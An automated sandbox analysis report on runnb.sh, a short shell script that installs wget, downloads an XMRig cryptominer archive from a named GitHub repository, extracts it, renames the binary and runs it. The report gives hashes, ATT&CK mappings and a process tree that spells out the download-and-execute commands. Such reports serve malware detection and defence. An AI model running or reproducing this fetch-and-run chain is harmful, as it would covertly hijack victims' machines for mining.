Analysis
max time kernel: 39s
max time network: 156s
platform: debian-12_armhf
resource: debian12-armhf-20240221-en
resource tags: arch:armhf, image:debian12-armhf-20240221-en, kernel:6.1.0-17-armmp-lpae, locale:en-us, os:debian-12-armhf, system
submitted: 30-10-2024 08:11
Static task: static1
Behavioral task: behavioral1 (sample: runnb.sh, resource: debian12-armhf-20240221-en)
Behavioral task: behavioral2 (sample: runnb.sh, resource: ubuntu2004-amd64-20240611-en)
Behavioral task: behavioral3 (sample: runnb.sh, resource: ubuntu2204-amd64-20240611-en)
Behavioral task: behavioral4 (sample: runnb.sh, resource: ubuntu2404-amd64-20240523-en)
General
Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
- XMRig Miner payload (2 IoCs)
  resource | yara_rule
  behavioral1/files/fstream-38.dat | family_xmrig
  behavioral1/files/fstream-38.dat | xmrig
- Xmrig family
- Xmrig_linux family
- xmrig
  XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.
- File and Directory Permissions Modification (1 TTPs, 1 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid | Process
  804 | chmod
- Executes dropped EXE (1 IoCs)
  ioc | pid | Process
  /tmp/xmrig-6.22.0/cool | 806 | cool
- OS Credential Dumping (1 TTPs, 2 IoCs)
  Adversaries may attempt to dump credentials to use them in password cracking.
  description | ioc | Process
  File opened for reading | /etc/shadow | sudo
  File opened for reading | /etc/shadow | dpkg-preconfigure
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
  Abuse sudo or cached sudo credentials to execute code.
  description | ioc | Process
  File deleted | /var/log/apt/eipp.log.xz | apt
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Write file to user bin folder (1 IoCs)
  description | ioc | Process
  File opened for modification | /usr/bin/wget.dpkg-new | dpkg
- Checks CPU configuration (1 TTPs, 6 IoCs)
  Checks CPU information that indicates whether the system is a virtual machine.
  description | ioc | Process
  File opened for reading | /proc/cpuinfo | http
  File opened for reading | /proc/cpuinfo | apt
  File opened for reading | /proc/cpuinfo | wget
  File opened for reading | /proc/cpuinfo | sendmail
  File opened for reading | /proc/cpuinfo | exim4
  File opened for reading | /proc/cpuinfo | http
- Reads CPU attributes (1 TTPs, 1 IoCs)
  description | ioc | Process
  File opened for reading | /sys/devices/system/cpu/online | exim4
- Processes:
  description | ioc | Process
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/filesystems | mv
  File opened for reading | /proc/self/stat | sudo
  File opened for reading | /proc/sys/crypto/fips_enabled | http
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/filesystems | tar
  File opened for reading | /proc/meminfo | dpkg-deb
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/filesystems | tar
  File opened for reading | /proc/filesystems | sudo
  File opened for reading | /proc/1/limits | sudo
  File opened for reading | /proc/self/fd | apt
  File opened for reading | /proc/sys/kernel/ngroups_max | sendmail
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/sys/kernel/seccomp/actions_avail | sudo
  File opened for reading | /proc/sys/kernel/ngroups_max | apt
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/sys/crypto/fips_enabled | apt
  File opened for reading | /proc/sys/kernel/cap_last_cap | sudo
  File opened for reading | /proc/sys/kernel/ngroups_max | sudo
  File opened for reading | /proc/self/fd | apt
  File opened for reading | /proc/filesystems | dpkg
  File opened for reading | /proc/meminfo | dpkg-deb
  File opened for reading | /proc/filesystems | dpkg
- Writes file to tmp directory (4 IoCs)
  Malware often drops required files in the /tmp directory.
  description | ioc | Process
  File opened for modification | /tmp/xmrig-6.22.0/xmrig | tar
  File opened for modification | /tmp/xmrigtar.tar.gz | wget
  File opened for modification | /tmp/xmrig-6.22.0/SHA256SUMS | tar
  File opened for modification | /tmp/xmrig-6.22.0/config.json | tar
Processes
(Each entry: image path [cmd: command line] PID; child processes are indented under their parent, and the signatures a process triggered are listed beneath it.)

/tmp/runnb.sh [cmd: /tmp/runnb.sh] PID:698
    /usr/bin/sudo [cmd: sudo apt install wget] PID:710
      - OS Credential Dumping
      - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
      - Reads runtime system information
        /usr/sbin/sendmail [cmd: sendmail -t] PID:723
          - Checks CPU configuration
          - Reads runtime system information
            /usr/sbin/exim4 [cmd: /usr/sbin/exim4 -Mc 1t62rw-0000Bf-23] PID:742
              - Checks CPU configuration
              - Reads CPU attributes
        /usr/bin/apt [cmd: apt install wget] PID:726
          - Deletes log files
          - Checks CPU configuration
          - Reads runtime system information
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --print-foreign-architectures] PID:735
              - Reads runtime system information
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --print-foreign-architectures] PID:754
              - Reads runtime system information
            /usr/lib/apt/methods/http [cmd: /usr/lib/apt/methods/http] PID:755
              - Checks CPU configuration
            /usr/lib/apt/methods/http [cmd: /usr/lib/apt/methods/http] PID:756
              - Checks CPU configuration
              - Reads runtime system information
            /bin/sh [cmd: /bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"] PID:763
                /usr/sbin/dpkg-preconfigure [cmd: /usr/sbin/dpkg-preconfigure --apt] PID:764
                  - OS Credential Dumping
                    /usr/local/sbin/locale [cmd: locale charmap] PID:765
                    /usr/local/bin/locale [cmd: locale charmap] PID:765
                    /usr/sbin/locale [cmd: locale charmap] PID:765
                    /usr/bin/locale [cmd: locale charmap] PID:765
                    /bin/sh [cmd: sh -c "stty -a 2>/dev/null"] PID:766
                        /usr/bin/stty [cmd: stty -a] PID:767
                    /bin/sh [cmd: sh -c "stty -a 2>/dev/null"] PID:768
                        /usr/bin/stty [cmd: stty -a] PID:769
                    /bin/sh [cmd: sh -c "stty -a 2>/dev/null"] PID:770
                        /usr/bin/stty [cmd: stty -a] PID:771
                    /bin/sh [cmd: sh -c "stty -a 2>/dev/null"] PID:772
                        /usr/bin/stty [cmd: stty -a] PID:773
                    /bin/sh [cmd: sh -c "stty -a 2>/dev/null"] PID:774
                        /usr/bin/stty [cmd: stty -a] PID:775
                    /bin/sh [cmd: sh -c "stty -a 2>/dev/null"] PID:776
                        /usr/bin/stty [cmd: stty -a] PID:777
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --assert-multi-arch] PID:778
              - Reads runtime system information
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --assert-protected-field] PID:779
              - Reads runtime system information
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --status-fd 18 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb] PID:780
              - Write file to user bin folder
              - Reads runtime system information
                /usr/sbin/dpkg-split [cmd: dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb] PID:781
                /usr/bin/dpkg-split [cmd: dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb] PID:781
                  - Software Deployment Tools
                /usr/sbin/dpkg-deb [cmd: dpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb /var/lib/dpkg/tmp.ci] PID:782
                /usr/bin/dpkg-deb [cmd: dpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb /var/lib/dpkg/tmp.ci] PID:782
                  - Reads runtime system information
                    /usr/sbin/tar [cmd: tar -x -f - "--warning=no-timestamp"] PID:785
                    /usr/bin/tar [cmd: tar -x -f - "--warning=no-timestamp"] PID:785
                      - Reads runtime system information
                /usr/sbin/dpkg-deb [cmd: dpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb] PID:787
                /usr/bin/dpkg-deb [cmd: dpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb] PID:787
                  - Reads runtime system information
                /usr/sbin/rm [cmd: rm -rf -- /var/lib/dpkg/tmp.ci] PID:791
                /usr/bin/rm [cmd: rm -rf -- /var/lib/dpkg/tmp.ci] PID:791
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --status-fd 18 --configure --pending] PID:792
              - Reads runtime system information
              - Software Deployment Tools
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --print-foreign-architectures] PID:795
              - Reads runtime system information
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --print-foreign-architectures] PID:796
              - Reads runtime system information
            /usr/bin/dpkg [cmd: /usr/bin/dpkg --print-foreign-architectures] PID:797
              - Reads runtime system information
    /usr/bin/apt [cmd: apt install wget] PID:798
      - Reads runtime system information
        /usr/bin/dpkg [cmd: /usr/bin/dpkg --print-foreign-architectures] PID:799
          - Reads runtime system information
        /usr/bin/dpkg [cmd: /usr/bin/dpkg --print-foreign-architectures] PID:800
          - Reads runtime system information
    /usr/bin/wget [cmd: wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz] PID:801
      - Checks CPU configuration
      - Writes file to tmp directory
    /usr/bin/tar [cmd: tar xvf xmrigtar.tar.gz] PID:802
      - Reads runtime system information
      - Writes file to tmp directory
        /usr/local/sbin/gzip [cmd: gzip -d] PID:803
        /usr/local/bin/gzip [cmd: gzip -d] PID:803
        /usr/sbin/gzip [cmd: gzip -d] PID:803
        /usr/bin/gzip [cmd: gzip -d] PID:803
    /usr/bin/chmod [cmd: chmod +x xmrig] PID:804
      - File and Directory Permissions Modification
    /usr/bin/mv [cmd: mv xmrig cool] PID:805
      - Reads runtime system information
    /tmp/xmrig-6.22.0/cool [cmd: ./cool] PID:806
      - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- Abuse Elevation Control Mechanism (1): Sudo and Sudo Caching (1)
- File and Directory Permissions Modification (1): Linux and Mac File and Directory Permissions Modification (1)
- Indicator Removal (1): Clear Linux or Mac System Logs (1)
- Virtualization/Sandbox Evasion (1): System Checks (1)
Downloads